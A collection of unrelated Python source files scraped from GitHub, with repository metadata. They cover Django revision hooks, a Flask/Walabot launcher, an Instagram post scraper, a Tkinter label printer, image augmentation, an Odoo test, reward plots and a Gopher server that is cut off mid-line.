# cache (this is normally done in the translation `save_base`
# method, but it is not called when reverting changes).
post_save.connect(self._update_cache, sender=root_model)
def _update_cache(self, sender, instance, raw, **kwargs):
"""Update the translations cache when restoring from a revision."""
if raw:
# Raw is set to true (only) when restoring from fixtures or,
# django-reversion
cache._cache_translation(instance)
class PlaceholderVersionAdapterMixin(object):
follow_placeholders = True
def __init__(self, model):
super(PlaceholderVersionAdapterMixin, self).__init__(model)
# Add cms placeholders the to the models to follow.
placeholders = getattr(model._meta, 'placeholder_field_names', None)
if self.follow_placeholders and placeholders:
self.follow = list(self.follow) + placeholders
post_save.connect(self._add_plugins_to_revision, sender=model)
def _add_plugins_to_revision(self, sender, instance, **kwargs):
rev_ctx = self.revision_manager._revision_context_manager
if rev_ctx.is_active() and not rev_ctx.is_managing_manually():
add_placeholders_to_revision(
instance=instance,
revision_manager=self.revision_manager,
rev_ctx=rev_ctx,
)
class ContentEnabledVersionAdapter(TranslatableVersionAdapterMixin,
PlaceholderVersionAdapterMixin,
VersionAdapter):
pass
version_controlled_content = partial(default_revision_manager.register,
adapter_cls=ContentEnabledVersionAdapter,
revision_manager=default_revision_manager)
| aldryn/aldryn-reversion | aldryn_reversion/core.py | core.py | py | 4,835 | python | en | code | 1 | github-code | 36 |
6217952013 | """
Runs that functionality of the program, the flask app and the server that communicates with Walabot.
"""
from threading import Thread
from meeting_room import app
from FreeRoomsServer import FreeRoomsServer
from config import HOST, PORT
def main():
"""
Start the server that communicates with Walabot and the flask app the communicated with Alexa.
"""
try:
server = FreeRoomsServer(HOST, PORT)
free_rooms_server_thread = Thread(target=server.start)
alexa_server_thread = Thread(target=app.run)
free_rooms_server_thread.start()
alexa_server_thread.start()
free_rooms_server_thread.join()
alexa_server_thread.join()
except Exception:
print("Unknown exception occurred!")
raise
if __name__ == '__main__':
main()
| Walabot-Projects/Walabot-MeetingRoom | server/main.py | main.py | py | 817 | python | en | code | 1 | github-code | 36 |
70862843305 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 15 14:41:09 2022
@author: bas
"""
#https://instaloader.github.io/as-module.html
import instaloader
from datetime import datetime
from login import getMyUsername
import random
import pandas
def login(L, username, filename='login_session'):
if not isinstance(L.test_login(),str):
L.load_session_from_file(username, filename=filename)
return L
def get_posts(L, myUsername, targetUsername, datetimeEarliest, datetimeLatest):
L=login(L, myUsername)
profile = instaloader.Profile.from_username(L.context, targetUsername)
print('getting all posts...')
posts = [post for post in profile.get_posts()]
print('selecting posts...')
posts_interval = [post for post in posts if (post.date_utc>datetimeEarliest and post.date_utc<datetimeLatest)]
return posts_interval
if not 'L' in locals():
L = instaloader.Instaloader()
if not 'posts' in locals():
username = 'nyenrodebu'
myUsername = getMyUsername()
date_earliest = datetime(2020, 1, 1)
date_latest = datetime(2022, 1, 1)
posts = get_posts(L, myUsername, username, date_earliest, date_latest)
n = 78
posts_sampled = random.sample(posts, n)
posts_dict = {}
n_post = 0
for post in posts_sampled:
n_post += 1
print(f'post {n_post}/{n}')
post_dict = {}
post_dict['is_video'] = post.is_video
post_dict['likes'] = post.likes
post_dict['video_duration'] = post.video_duration
post_dict['video_view_count'] = post.video_view_count
post_dict['title'] = post.title
post_dict['url'] = f'https://www.instagram.com/p/{post.shortcode}/'
post_dict['mediacount'] = post.mediacount
post_dict['caption'] = post.caption
post_dict['date_utc'] = post.date_utc
post_dict['comments'] = post.comments
posts_dict[post.mediaid] = post_dict
df = pandas.DataFrame.from_dict(posts_dict, orient='index')
df.to_csv(f'output_files/username={username}_posts={n}.csv')
| Basdorsman/instagram-analysis | collect_data.py | collect_data.py | py | 1,976 | python | en | code | 0 | github-code | 36 |
9710241755 | import subprocess
from datetime import datetime
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
from local import my_printer, printer_list
# Ce programme imprime de petites étiquettes pour des tubes de type Eppendorf 1.5 ml
# L'utilisateur dispose de 4 champs.
# L'utilisateur peut décider d'imprimer la date d'impression ou un cinquième champ.
# Fonction pour imprimer les étiquettes
def print_labels():
field_1 = entry_field_1.get()
field_2 = entry_field_2.get()
field_3 = entry_field_3.get()
field_4 = entry_field_4.get()
nb_labels = int(entry_nb_labels.get()) # Récupère le nombre d'étiquettes
if add_date_var.get():
now = datetime.now().strftime("%Y/%m/%d %H:%M")
else:
now = alt_field_for_date.get()
ipl_format_for_Epp_1_5_ml = f"""
<STX><ESC>C<ETX><STX><ESC>P<ETX><STX>E5;F5;<ETX>
<STX>H01;o315,565;b0;f2;h01;w01;c34;d3,{field_1};<ETX>
<STX>H02;o55,565;b1;f2;h01;w01;c31;d3,{field_2};<ETX>
<STX>H04;o315,520;b0;f2;h01;w01;c34;d3,{field_3};<ETX>
<STX>H05;o315,455;b0;f2;h02;w01;c2;d3,{field_4};<ETX>
<STX>H06;o315,415;b0;f2;h01;w01;c30;d3,{now};<ETX>
/* ligne */
<STX>L07;o315,380;f2;l1300;w4<ETX>
# <STX>B10;o125,115;c2;f3;h160;w03;i0;d3," + ";<ETX>
/* afficher ALIQUOT BIO MOL */
<STX>H14;o315,300;b1;f2;h01;w01;c31;d3,BIOMOL;<ETX>
/* Mini étiquette pour couvercle */
<STX>H16;o315,100;b0;f2;h01;w01;c31;d3,{field_1};<ETX>
<STX>H17;o315,65;b0;f2;h01;w01;c31;d3,{field_3};<ETX>
<STX>R<ETX><STX><ESC>E5<CAN><ETX><STX><RS>{nb_labels}<ETB><ETX>
"""
with open("etiq.txt", 'w') as f:
f.writelines(ipl_format_for_Epp_1_5_ml)
try:
subprocess.check_output(["copy", ".\etiq.txt", selected_printer.get()], shell=True)
messagebox.showinfo("Impression réussie", "Les étiquettes ont été imprimées avec succès.")
except Exception as e:
messagebox.showerror("Erreur d'impression", f"Une erreur est survenue lors de l'impression : {str(e)}")
# Fonction pour activer ou désactiver le champ field_5 en fonction de la case à cocher
def toggle_field_5():
if add_date_var.get():
alt_field_for_date.grid_remove() # Masquer le champ field_5
else:
alt_field_for_date.grid(row=6, column=1) # Afficher le champ field_5
alt_field_for_date.configure(state ='normal')
# Création de la fenêtre principale
root = tk.Tk()
# root.geometry("600x400")
root.title("Générateur d'étiquettes")
# Sélection de l'imprimante
printer_frame = ttk.Frame(root)
printer_frame.grid(row= 0, column=0, rowspan=2, columnspan=2)
label_printer = ttk.Label(printer_frame, text="Sélectionnez l'imprimante :")
label_printer.grid(row = 0, column = 0, pady = 30, sticky='W')
# printer_list = ["Imprimante1", "Imprimante2", "Imprimante3"] # Remplacez par vos imprimantes réelles
selected_printer = tk.StringVar(value=printer_list[0])
printer_menu = ttk.Combobox(printer_frame, textvariable=selected_printer, values=printer_list)
printer_menu.grid(row = 0, column = 1, sticky='W')
# Champs à remplir
entry_frame = ttk.Frame(root)
entry_frame.grid(pady=20, padx= 50)
label_fields = ttk.Label(entry_frame, text="Remplissez les champs :")
label_fields.grid(row=1, column=0, rowspan=3)
entry_field_1 = ttk.Entry(entry_frame, width=11)
entry_field_1.insert(0, "25121245")
entry_field_1.grid(row=1, column=1, sticky='W')
entry_field_2 = ttk.Entry(entry_frame, width=2) # Champ 2 réduit à 2 caractères
entry_field_2.insert(0, "98")
entry_field_2.grid(row=1, column=2, sticky='W')
entry_field_3 = ttk.Entry(entry_frame, width=24)
entry_field_3.insert(0, "TEST second")
entry_field_3.grid(row=2, column=1 )
entry_field_4 = ttk.Entry(entry_frame, width=20)
entry_field_4.insert(0, "31/12/1964 M")
entry_field_4.grid(row=3, column=1, sticky='W' )
# Option pour ajouter la date du jour
add_date_var = tk.BooleanVar(value = True)
add_date_checkbox = ttk.Checkbutton(entry_frame, text="Ajouter la date du jour", variable=add_date_var,
command=toggle_field_5)
add_date_checkbox.grid(row=5, column=1)
# Champ pour spécifier le champ field_5 (initialement grisé)
label_field_5 = ttk.Label(entry_frame, text="Champ libre :")
label_field_5.grid(row=6, column=0)
alt_field_for_date = ttk.Entry(entry_frame, width=20,
state="disabled"
)
alt_field_for_date.grid(row=6, column=1)
# Champ pour spécifier le nombre d'étiquettes à imprimer
last_frame = ttk.Frame(root)
last_frame.grid(pady=20)
label_nb_labels = ttk.Label(last_frame, text="Nombre d'étiquettes à imprimer :")
label_nb_labels.grid(row= 0, column= 0)
entry_nb_labels = ttk.Entry(last_frame, width=5)
entry_nb_labels.insert(0, "3") # Valeur par défaut
entry_nb_labels.grid(row= 0, column= 1, sticky='W')
# Bouton d'impression
bottom_frame = ttk.Frame(root)
bottom_frame.grid(pady=20)
print_button = ttk.Button(bottom_frame, text="Imprimer", command=print_labels)
print_button.grid(row= 1, column = 1)
root.mainloop()
input("") | bermau/py_liq_dilutions | tk_label.py | tk_label.py | py | 5,100 | python | fr | code | 0 | github-code | 36 |
6971950883 | '''creating a form using flask to get username and password using html
and displaying success on submitting'''
from flask import Flask, redirect, render_template, request
app = Flask(__name__)
@app.route('/')
def home():
return render_template("index.html")
@app.route("/success", methods = ['POST', "GET"])
def success():
if request.method == 'POST':
result = request.form
uname = request.form['username']
return render_template("success.html", result= result, username=uname)
if __name__ == '__main__':
app.run(debug=True) | R19R/Login_App_Using_Flask | may8th_ex1.py | may8th_ex1.py | py | 590 | python | en | code | 0 | github-code | 36 |
24331960093 | from argparse import ArgumentParser
from ast import parse
import os
def handle_file(filename: str, blank: list[str]):
with open(filename) as f:
content = f.readlines()
data = ['[']
data.extend([f'"{x}",' for x in blank])
data.extend(['\n'])
skip = True
for line in content:
# line2 = line.replace(',', '').replace('"', '').strip()
# print(f"{line2=}")
# if line2 in blank:
# continue
if '[' in line or ']' in line:
continue
# print(f"{line=}")
if line == '\n':
skip = False
continue
if skip:
continue
data.append(line.strip())
data.append(']\n')
with open(filename, 'w') as f:
f.write('\n'.join(data))
if __name__ == '__main__':
parser = ArgumentParser(description='Update all templates based on the blank template')
parser.add_argument(type=str, dest='filename', help='blank template')
args = parser.parse_args()
blank_file = args.filename
with open(blank_file) as f:
blank = f.read().replace('[', '').replace(']', '').replace('"', '').replace(',' , '').strip().split('\n')
for _, _, files in os.walk('.'):
for filename in files:
if filename == blank_file:
continue
if filename.endswith('.txt'):
print(filename)
handle_file(filename, blank)
| zeusops/mission-templates | limited-arsenal-factions/update.py | update.py | py | 1,430 | python | en | code | 3 | github-code | 36 |
30249155883 | import cv2
import os
import numpy as np
import PIL.Image
from PIL import ImageEnhance
# per ogni immagine presente nella cartella crea una foto più luminosa e una meno luminosa
def imageBrightener(pathImmagine, pathContorno, pathSalvataggio, pathSalvataggioContorno):
os.chdir(pathImmagine)
files = os.listdir()
chiara = 1.25
scura = 0.75
i = 1
lenFiles = len(files)
for file in files:
print(f'Immagine {i} di {lenFiles}')
img = PIL.Image.open(pathImmagine + "\\" + file)
# image brightness enhancer
enhancer = ImageEnhance.Brightness(img)
im_output = enhancer.enhance(scura)
if im_output.mode != 'RGB':
im_output = im_output.convert('RGB')
save = f'{pathSalvataggio}\\{file[:len(file) - 4]}_darkened.jpg'
opencvImage = cv2.cvtColor(np.array(im_output), cv2.COLOR_RGB2BGR)
cv2.imwrite(save, opencvImage)
contorno = cv2.imread(f'{pathContorno}\\{file[:len(file) - 4]}.png')
cv2.imwrite(f'{pathSalvataggioContorno}\\{file[:len(file) - 4]}_darkened.png', contorno)
im_output2 = enhancer.enhance(chiara)
opencvImage2 = cv2.cvtColor(np.array(im_output2), cv2.COLOR_RGB2BGR)
cv2.imwrite(f'{pathSalvataggio}\\{file[:len(file) - 4]}_brightened.jpg', opencvImage2)
cv2.imwrite(f'{pathSalvataggioContorno}\\{file[:len(file) - 4]}_brightened.png', contorno)
i += 1
# per ogni immagine presente nella cartella crea una foto più luminosa e una meno luminosa
def imageContrast(pathImmagine, pathContorno, pathSalvataggio, pathSalvataggioContorno):
os.chdir(pathImmagine)
files = os.listdir()
chiara = 1.25
scura = 0.75
i = 1
lenFiles = len(files)
for file in files:
print(f'Immagine {i} di {lenFiles}')
img = PIL.Image.open(pathImmagine + "\\" + file)
# image brightness enhancer
enhancer = ImageEnhance.Contrast(img)
im_output = enhancer.enhance(scura)
if im_output.mode != 'RGB':
im_output = im_output.convert('RGB')
save = f'{pathSalvataggio}\\{file[:len(file) - 4]}_lessContrast.jpg'
opencvImage = cv2.cvtColor(np.array(im_output), cv2.COLOR_RGB2BGR)
cv2.imwrite(save, opencvImage)
contorno = cv2.imread(f'{pathContorno}\\{file[:len(file) - 4]}.png')
cv2.imwrite(f'{pathSalvataggioContorno}\\{file[:len(file) - 4]}_lessContrast.png', contorno)
im_output2 = enhancer.enhance(chiara)
opencvImage2 = cv2.cvtColor(np.array(im_output2), cv2.COLOR_RGB2BGR)
cv2.imwrite(f'{pathSalvataggio}\\{file[:len(file) - 4]}_moreContrast.jpg', opencvImage2)
cv2.imwrite(f'{pathSalvataggioContorno}\\{file[:len(file) - 4]}_moreContrast.png', contorno)
i += 1
# rupta l'immagine di un angolo dato in input
def rotateAngle(img, angle, color):
"""
Rotates an image (angle in degrees) and expands image to avoid cropping
"""
height, width = img.shape[:2] # image shape has 3 dimensions
image_center = (width/2, height/2) # getRotationMatrix2D needs coordinates in reverse order (width, height) compared to shape
rotation_img = cv2.getRotationMatrix2D(image_center, angle, 1.)
# rotation calculates the cos and sin, taking absolutes of those.
abs_cos = abs(rotation_img[0,0])
abs_sin = abs(rotation_img[0,1])
# find the new width and height bounds
bound_w = int(height * abs_sin + width * abs_cos)
bound_h = int(height * abs_cos + width * abs_sin)
# subtract old image center (bringing image back to origo) and adding the new image center coordinates
rotation_img[0, 2] += bound_w/2 - image_center[0]
rotation_img[1, 2] += bound_h/2 - image_center[1]
# rotate image with the new bounds and translated rotation imgrix
rotated_img = cv2.warpAffine(img, rotation_img, (bound_w, bound_h), borderValue=color)
return rotated_img
# crea tutte le rotazioni dell'immagine di partenza
def createImageRotations(path, pathSalvataggio, color, extension):
angles = [30, 45, 60, 120, 150, 270]
os.chdir(path)
files = os.listdir()
i = 1
for file in files:
print("Immagine numero: " + str(i) + "su 515")
filePath = path + "\\" + file
savePath = pathSalvataggio + "\\" + file
print(savePath)
original = cv2.imread(filePath)
if original is None:
stream = open(filePath, "rb")
bytesArray = bytearray(stream.read())
numpyarray = np.asarray(bytesArray, dtype=np.uint8)
original = cv2.imdecode(numpyarray, cv2.IMREAD_UNCHANGED)
for angle in angles:
img = rotateAngle(original, angle, color)
cv2.imwrite(savePath[:len(savePath) - 4] + "_" + str(angle) + extension, img)
i = i + 1
# permette di specchiare le immagini
def flipImages(path, pathSalvataggio, extension):
os.chdir(path)
files = os.listdir()
i = 1
for file in files:
print("Immagine numero: " + str(i))
filePath = path + file
savePath = pathSalvataggio + "\\" + file
print(savePath)
original = cv2.imread(filePath)
if original is None:
stream = open(filePath, "rb")
bytesArray = bytearray(stream.read())
numpyarray = np.asarray(bytesArray, dtype=np.uint8)
original = cv2.imdecode(numpyarray, cv2.IMREAD_UNCHANGED)
img = cv2.flip(original, 1)
cv2.imwrite(savePath[:len(savePath) - 4] + "_flipped" + extension, img)
i = i + 1
# salvare immagini e aprirle con cv2
# per ogni immagine
# per ogni angolo
# ruota immagine e salva
if __name__ == '__main__':
dirname = os.path.dirname(__file__)
pathContorni = os.path.join(dirname, 'Dataset\\Contorni\\')
pathNuoviContorni =os.path.join(dirname, 'Dataset\\ContorniRotazione\\')
pathOriginali = os.path.join(dirname, 'Dataset\\JPEGImages\\')
pathOriginaliRotazione = os.path.join(dirname, 'Dataset\\JPEGRotazione\\')
createImageRotations(pathContorni, pathNuoviContorni, (0,0,0), '.png')
createImageRotations(pathOriginali, pathOriginaliRotazione, (0,0,255), '.jpg')
print("Nuovi contorni")
flipImages(pathNuoviContorni, pathNuoviContorni, ".png")
print("Contorni")
flipImages(pathContorni, pathNuoviContorni, ".png")
print("Ruotate")
flipImages(pathOriginaliRotazione, pathOriginaliRotazione, ".jpg")
print("Originali")
flipImages(pathOriginali, pathOriginaliRotazione, ".jpg")
imageBrightener(pathOriginaliRotazione, pathNuoviContorni, pathOriginaliRotazione, pathNuoviContorni)
imageBrightener(pathOriginali, pathContorni, pathOriginaliRotazione, pathNuoviContorni)
imageContrast(pathOriginaliRotazione, pathNuoviContorni, pathOriginaliRotazione, pathNuoviContorni)
imageContrast(pathOriginali, pathContorni, pathOriginaliRotazione, pathNuoviContorni)
| ApulianGCC/TesiSegmentazionePinna | data_augmentation.py | data_augmentation.py | py | 6,913 | python | it | code | 0 | github-code | 36 |
30692147773 | from odoo.tests.common import TransactionCase
class TestNlLocationNuts(TransactionCase):
def setUp(self):
super(TestNlLocationNuts, self).setUp()
self.env['res.country.state'].create({
'name': 'Noord-Brabant',
'code': 'NB',
'country_id': self.env.ref('base.nl').id
})
importer = self.env['nuts.import']
importer.run_import()
def test_dutch_nuts(self):
"""
Test that level 3 nuts correctly bind Dutch provinces.
"""
self.nb_nuts = self.env['res.partner.nuts'].search(
[('code', '=', 'NL41')])
self.assertTrue(self.nb_nuts)
self.assertTrue(self.nb_nuts.state_id)
self.nl_partner = self.env['res.partner'].create({
'name': 'Dutch Partner',
'country_id': self.env.ref('base.nl').id
})
self.nl_partner.state_id = self.nb_nuts.state_id
# Onchange method binds level 3 nuts with Dutch provinces.
self.nl_partner.onchange_state_id_base_location_nuts()
self.assertEqual(
self.nl_partner.state_id,
self.nl_partner.nuts3_id.state_id)
| pscloud/l10n-netherlands | l10n_nl_location_nuts/tests/test_l10n_nl_location_nuts.py | test_l10n_nl_location_nuts.py | py | 1,171 | python | en | code | null | github-code | 36 |
34998272866 | # Import packages
import cv2
import numpy as np
from PIL import Image
from pytesseract import pytesseract
from pytesseract import Output
if __name__ == "__main__":
img = cv2.imread('shelf_for_rectangles.jpg')
print(img.shape) # Print image shape
cv2.imshow("original", img)
# Cropping an image
# cropped_image = img[35:75, 65:275] #1
# cropped_image = img[35:75, 285:495] #2
# cropped_image = img[35:75, 495:705] #3
# cropped_image = img[35:75, 715:925] #4
# cropped_image = img[175:215, 65:275] #LCD 5
# cropped_image = img[175:215, 285:495] # 6
# cropped_image = img[175:215, 495:705] #7
# cropped_image = img[175:215, 715:925] #8
# cropped_image = img[310:345, 65:275] #9 battery
# cropped_image = img[310:345, 285:495] #10
# cropped_image = img[310:345, 495:705] #11
# cropped_image = img[310:345, 715:925] #12
# cropped_image = img[450:485, 153:300] #13 joystick
# cropped_image = img[450:485, 395:620] #14
# cropped_image = img[450:495, 670:910] #15
# cropped_image = img[630:675, 420:590] #16 arduino
#list with positions : pos (upper left corner) for all signs
signs = [[35,65],]
w = 210 #width sign
h = 40 #hight sign
# A text file is created and flushed
file = open("signs_position_name.txt", "w+")
file.write("")
file.close()
# Creating a copy of image
im2 = img.copy()
for pos in signs:
y = pos[0]
x = pos[1]
mid_x = x + w/2
mid_x = str(int(mid_x))
mid_y = y + h/2
mid_y = str(int(mid_y))
cropped = im2[y:y + h, x:x + w]
text = pytesseract.image_to_string(cropped)
file = open("signs_position_name.txt", "a")
if text == '':
continue
# Appending the text into file
file.write(text + ' - ' + mid_x + ',' + mid_y + ',90')
file.close()
# Display cropped image
cv2.imshow("cropped", cropped_image)
# Save the cropped image
cv2.imwrite("Cropped Image.jpg", cropped_image)
cv2.waitKey(0)
#cv2.destroyAllWindows()
imgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
def tesseract():
path_to_tesseract = r"C:\Program Files\Tesseract-OCR\tesseract.exe"
image_path = 'Cropped Image.jpg'
pytesseract.tesseract_cmd = path_to_tesseract
text = pytesseract.image_to_string(Image.open(image_path))
print(text[:-1])
tesseract() | klarahi/Fuzzy_project | cropped_image.py | cropped_image.py | py | 2,544 | python | en | code | 0 | github-code | 36 |
3325760856 | from django.contrib import admin
from .models import Review
# Register your models here.
class ReviewAdmin(admin.ModelAdmin):
list_display = (
'product',
'user',
'rating',
'title',
'description',
'review_date',
)
ordering = ('product',)
admin.site.register(Review, ReviewAdmin)
| mosull20/crushed-grapes-ms4 | reviews/admin.py | admin.py | py | 343 | python | en | code | 0 | github-code | 36 |
13565958708 | # Author: Joshua Jackson
# Date: 06/20/2020
# This file will contain the class which create Word2Vec file using gensim
from gensim.models import Word2Vec
from gensim.models.phrases import Phrases, Phraser
from datetime import datetime
# script to create word embeddings for Neural Network weight
class word2vec:
def __init__(self, debug=False):
try:
#initiliaze init variable
self.debug = debug
except Exception as e:
print(f"Something went wrong in __init__: {e}")
#using a pre tokenized list create the word2vec traing data
def create_bigram_embedding(self, tokens, emb_size=250, minCount=1, threshold_amount=1, workers=3, algo=0, window=5):
try:
#generate tri-gram using gensim
phrases = Phrases(tokens, min_count=minCount, threshold=threshold_amount)
#create bi-gram
bigram = Phraser(phrases)
#build model
model = Word2Vec(bigram[tokens],\
size=emb_size,\
window=window,\
min_count=minCount,\
workers=workers,\
sg=algo)
dateTimeObj = datetime.now()
timestampStr = dateTimeObj.strftime("%d-%b-%Y")
#save model to local directory as bin file
#save both binary and non binary file
model.save(f'bigram-model-{timestampStr}.bin', binary=True)
model.save(f'bigram-model-{timestampStr}.txt', binary=False)
return model
except Exception as e:
print(f"Something went wrong in create_training_data: {e}")
| jjacks95/sentiment-analysis-financial-news | financialTextProcessing/financialTextProcessing/createWord2Vec.py | createWord2Vec.py | py | 1,730 | python | en | code | 3 | github-code | 36 |
41801368948 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 9 14:49:52 2023
@author: intern
"""
import cv2
kernel = np.ones((3, 3), dtype=np.uint8)
erosion = cv2.erode(im0, kernel, iterations=1)
plt.imshow( erosion[:,:,0:3])
#%%
erosion = cv2.morphologyEx(im0, cv2.MORPH_OPEN, kernel, 1)
plt.imshow( erosion[:,:,0:3])
hsvim = rgb_to_hsv(erosion[:,:,0:3])
#%%
float("0.5555554573")
a = format(float("0.5555554573"), '.6f') | xsmsh7/label-color | filterblackedge.py | filterblackedge.py | py | 436 | python | en | code | 0 | github-code | 36 |
945909782 | pkgname = "libsbsms"
pkgver = "2.3.0"
pkgrel = 0
build_style = "cmake"
hostmakedepends = [
"cmake",
"ninja",
"pkgconf",
]
pkgdesc = "Library for high quality time and pitch scale modification"
maintainer = "psykose <alice@ayaya.dev>"
license = "GPL-2.0-or-later"
url = "https://github.com/claytonotey/libsbsms"
source = (
f"https://github.com/claytonotey/libsbsms/archive/refs/tags/{pkgver}.tar.gz"
)
sha256 = "4f88d152bc06fedbda9d5d65517d40254a7310c9050601a93122309d45afd2c9"
# vis breaks symbols
hardening = []
# no tests
options = ["!check"]
@subpackage("libsbsms-devel")
def _devel(self):
return self.default_devel()
| chimera-linux/cports | contrib/libsbsms/template.py | template.py | py | 643 | python | en | code | 119 | github-code | 36 |
37662015618 | from PyQt5.QtWidgets import QDialog, QComboBox, QPushButton, QRadioButton
from pulse.utils import error
from os.path import basename
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import Qt
from PyQt5 import uic
import configparser
class ElementTypeInput(QDialog):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
uic.loadUi('pulse/uix/user_input/ui/elementTypeInput.ui', self)
icons_path = 'pulse\\data\\icons\\'
self.icon = QIcon(icons_path + 'pulse.png')
self.setWindowIcon(self.icon)
self.index = 0
self.element_type = 'pipe_1'
self.comboBox = self.findChild(QComboBox, 'comboBox')
self.comboBox.currentIndexChanged.connect(self.selectionChange)
self.index = self.comboBox.currentIndex()
self.radioButton_all = self.findChild(QRadioButton, 'radioButton_all')
self.radioButton_entity = self.findChild(QRadioButton, 'radioButton_entity')
self.radioButton_all.toggled.connect(self.radioButtonEvent)
self.radioButton_entity.toggled.connect(self.radioButtonEvent)
self.flagAll = self.radioButton_all.isChecked()
self.flagEntity = self.radioButton_entity.isChecked()
self.pushButton_2 = self.findChild(QPushButton, 'pushButton_confirm')
self.pushButton_2.clicked.connect(self.button_clicked)
self.exec_()
def radioButtonEvent(self):
self.flagAll = self.radioButton_all.isChecked()
self.flagEntity = self.radioButton_entity.isChecked()
def keyPressEvent(self, event):
if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:
self.check()
elif event.key() == Qt.Key_Escape:
# self.index = -1
self.close()
def selectionChange(self, index):
self.index = self.comboBox.currentIndex()
if self.index == 0:
self.element_type = 'pipe_1'
elif self.index == 1:
self.element_type = 'pipe_2'
elif self.index == 2:
self.element_type = 'shell'
def check(self):
self.close()
def button_clicked(self):
self.check() | atbrandao/OpenPulse_f | pulse/uix/user_input/elementTypeInput.py | elementTypeInput.py | py | 2,166 | python | en | code | null | github-code | 36 |
72416805225 | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
def approach_angle_reward(roll,pitch):
if np.abs(roll) + np.abs(pitch) < 0.174:
return 100*np.exp((7.0*(0.174-np.abs(roll) - np.abs(pitch)))**1)
if (np.abs(roll) + np.abs(pitch)<=1.55)and(np.abs(roll) + np.abs(pitch) >=0.174):
return -6.0*(np.exp((3.2*(np.abs(roll) + np.abs(pitch)-0.174))**1))
if (np.abs(roll) + np.abs(pitch)>1.55):
return -500.0
def flip_reward(angle,prev_angle):
if np.abs(angle) < 0.26:
return 0.05*np.exp(20*(0.26-np.abs(angle)))
if (np.abs(angle)>=0.26):
return -7.0*np.exp((2.1*(np.abs(angle)-0.26))**1)
def approach_velocity_reward(velocity):
if velocity>1.6:
return -20.0*np.exp((0.45*(np.abs(velocity)))**1)
if (velocity<=1.6) and (velocity >=0.1):
return - 12.5 * np.exp(2.1*(velocity-0.1))
if velocity < 0.1:
return +55.0 * np.exp(20*(0.1-velocity))
# approach angle
#roll_space = np.linspace(-1.57,1.57,300)
#pitch_space = np.linspace(-1.57,1.57,300)
#X,Y = np.meshgrid(roll_space,pitch_space)
#
#Z = np.zeros(shape = (len(roll_space),len(pitch_space)))
#for it_r,r in enumerate(roll_space):
# for it_p,p in enumerate(pitch_space):
# Z[it_r,it_p] = approach_angle_reward(r,p)
# calculate angle_space for flipping
#angle_space = np.linspace(-3.14,3.14,500)
#dummy_space = np.linspace(-3.14,3.14,500)
#
#
#X,Y = np.meshgrid(angle_space,dummy_space)
#Z = np.zeros(shape = (len(angle_space),len(dummy_space)))
#
#for it_a1,a1 in enumerate(angle_space):
# for it_a2,a2 in enumerate(dummy_space):
# Z[it_a1,it_a2] = flip_reward(a1,a2)
# approach velocity
vel_space = np.linspace(0.0,10,500)
dummy_space = np.linspace(0.0,10,500)
X,Y = np.meshgrid(vel_space,dummy_space)
Z = np.zeros(shape = (len(vel_space),len(dummy_space)))
for it_a1,a1 in enumerate(vel_space):
for it_a2,a2 in enumerate(dummy_space):
Z[it_a1,it_a2] = approach_velocity_reward(a1)
fig, ax = plt.subplots(figsize=(7, 7), dpi=100)
# for positive values
p = ax.pcolor(X, Y, Z, cmap=plt.cm.RdBu, vmin=(Z).min(), vmax=(Z).max())
#p = ax.pcolor(X, Y, Z, cmap=plt.cm.RdBu, vmin=Z.min(), vmax=Z.max())
cb = fig.colorbar(p)
#cnt = plt.contour(Z, cmap=plt.cm.RdBu, vmin=abs(Z).min(), vmax=abs(Z).max(), extent=[0, 1, 0, 1])
| Zbigor/DeepRL_UAV_landing | drl_landing/rl_pipeline/catkin_ws/src/hummingbird/scripts/plot_reward_functions.py | plot_reward_functions.py | py | 2,384 | python | en | code | 2 | github-code | 36 |
10876940486 | """
A Gopher Server written in Python
author: Julia Connelly, Adante Ratzlaff, Jack Wines
CS 331, Spring 2018
date: 12 April 2018
"""
import sys
import socket
import os
class GopherServer:
def __init__(self, port=50000):
self.port = port
self.host = ""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
self.links = GopherServer.readLinks("root/")
@staticmethod
def cleanLinksFile(s):
cleanLinks = ""
splitLines = s.split("\n")
splitLines.sort()
for line in splitLines:
splitLine = line.split("\t")
properLengths = [70 - 1, 225 - 1]
for name, length, i in zip(splitLine[:2], properLengths, range(2)):
splitLine[i] = name[:length]
cleanLinks += "\t".join(splitLine) + "\r\n"
return cleanLinks
@staticmethod
def readLinks(linksPath):
try:
with open(linksPath + ".links", "r") as linksFile:
return GopherServer.cleanLinksFile(linksFile.read())
except OSError:
return None
@staticmethod
def readFile(filePath):
try:
with open(filePath, "r", encoding = "ascii", errors = "ignore") as file:
return file.read()
except OSError:
return None
@staticmethod
def getResponse(filePath):
filePath = "root/" + filePath.replace("\r", "").replace("\n", "")
if os.path.isdir(filePath):
return GopherServer.readLinks(filePath)
else:
return GopherServer.readFile(filePath)
@staticmethod
def addPeriodOnNewLine(resp):
return resp + "\r\n."
# returns False and prints if fails
@staticmethod
def safeDecode(data, clientSock):
try:
return data.decode(encoding = "ascii", errors = "ignore")
except UnicodeDecodeError:
errStr = "Error decoding from utf-8\r\n"
print(errStr, file=sys.stderr)
clientSock.sendall(errStr.encode('ascii'))
return None
# returns an error string and prints if fails
@staticmethod
def safeEncode(s):
try:
return s.encode('ascii', errors = "ignore")
except UnicodeEncodeError:
errStr = "Error encoding to utf-8. str: "
print(errStr, s, "\r\n", file=sys.stderr)
return errStr.encode('ascii', errors = "ignore")
def listen(self):
self.sock.listen(5)
while True:
clientSock, clientAddr = self.sock.accept()
print("Connection received from ", clientSock.getpeername())
data = clientSock.recv(1024)
# try to decode data. utf-8 is the default
decodedData = GopherServer.safeDecode(data, clientSock)
if not decodedData:
continue
# an empty string means we should send the .links file.
if decodedData.strip() == "":
toSend = GopherServer.safeEncode(GopherServer.addPeriodOnNewLine(self.links))
clientSock.sendall(toSend)
else:
info = GopherServer.getResponse(decodedData)
if info:
clientSock.sendall(GopherServer.safeEncode(GopherServer.addPeriodOnNewLine(info)))
else:
clientSock.sendall(
